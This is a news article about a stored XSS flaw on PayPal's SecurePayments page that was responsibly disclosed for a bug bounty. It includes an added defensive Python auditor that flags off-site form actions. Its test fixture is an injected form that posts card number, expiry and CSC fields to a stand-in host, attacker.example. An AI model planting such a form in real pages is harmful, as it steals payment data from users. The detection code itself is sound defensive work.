White hat hacker earns himself $750 / €665

Aug 27, 2015 11:25 GMT  ·  By
Attackers could have crafted their own HTML forms in the PayPal SecurePayments page

Ebrahim Hegazy, an Egypt-based security expert, has found and disclosed to PayPal's staff a security vulnerability that allowed an attacker to steal unencrypted credit card details.

Mr. Hegazy is primarily known for getting root access to one of Yahoo's servers, a vulnerability that also affected Microsoft's and Orange's domains.

He also has a history of disclosing security holes in the products of large online services such as Twitter, Yandex, eBay, and Google.

A cross-site scripting (XSS) flaw on PayPal’s SecurePayments page

According to Hegazy's blog post, the vulnerability was found only on the "https://securepayments.paypal.com" domain, which is used to process commercial transactions.

"I’ve found a Stored XSS vulnerability that affects the SecurePayments page directly which allowed me to alter the page HTML and rewrite the page content," says Hegazy.

Using this flaw, an attacker would have been able to inject his own payment forms in the page's HTML, allowing him to intercept the user's private financial information in clear text.

Since PayPal regularly asks users to enter credit card numbers, card expiration dates, CSC codes, and even names, users would have found it very hard to detect anything out of the ordinary when asked for these details.

Attackers would have had complete control over the page's HTML

When the "fake" form was filled in and submitted, the data could have been sent to any URL of the attacker's choosing.

Additionally, since the attacker had the option to craft his own forms, he could have also injected a form that looked like the PayPal login, getting the username and password for the victim's PayPal account.
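As an added defender-side illustration (not code from Hegazy's write-up or from PayPal), the short Python audit below parses a page's HTML and flags every form whose action would submit to a host other than the one serving the page, which is exactly what an injected payment or login form of the kind described above would do; it also notes the Content-Security-Policy directive that makes browsers refuse such submissions. The page body and the hostnames in it are constructed sample data.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class FormActionAuditor(HTMLParser):
    """Collect every <form action=...> in a page and mark those that
    would post form data to a host other than the allowed one."""

    def __init__(self, allowed_host):
        super().__init__()
        self.allowed_host = allowed_host.lower()
        self.findings = []  # list of (action, off_site) tuples

    def handle_starttag(self, tag, attrs):
        if tag != "form":
            return
        action = dict(attrs).get("action") or ""
        # Relative actions ("" or "/path") post back to the serving origin;
        # absolute and scheme-relative ("//host/path") actions carry a host.
        host = urlparse(action).hostname or ""
        off_site = bool(host) and host.lower() != self.allowed_host
        self.findings.append((action, off_site))


def audit_forms(html, allowed_host="securepayments.paypal.com"):
    parser = FormActionAuditor(allowed_host)
    parser.feed(html)
    parser.close()  # flush any buffered partial tag
    return parser.findings


def off_site_form_actions(html, allowed_host="securepayments.paypal.com"):
    """Return only the actions that would leak submitted fields off-site."""
    return [action for action, off_site in audit_forms(html, allowed_host) if off_site]


# Browser-side mitigation: with this header a form whose action points at
# another origin is blocked by the browser regardless of how it got into the DOM.
CSP_FORM_ACTION_HEADER = "Content-Security-Policy: form-action 'self'"

# Constructed sample: a legitimate payment form followed by an injected copy
# that posts the same fields to a constructed, attacker-controlled host.
SAMPLE_PAGE = """<html><body>
<form action="/cgi-bin/webscr" method="post">
  <input name="cc_number"><input name="exp_date"><input name="csc">
</form>
<form action="https://attacker.example/collect" method="post">
  <input name="cc_number"><input name="exp_date"><input name="csc">
</form>
</body></html>"""

if __name__ == "__main__":
    for action in off_site_form_actions(SAMPLE_PAGE):
        print("off-site form action:", action)
```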

The vulnerability was properly disclosed to the PayPal team back in June, and was fixed two days ago.

For his efforts, and in line with the PayPal bug bounty program, Mr. Hegazy was rewarded $750 / €665, as SecurityWeek reports.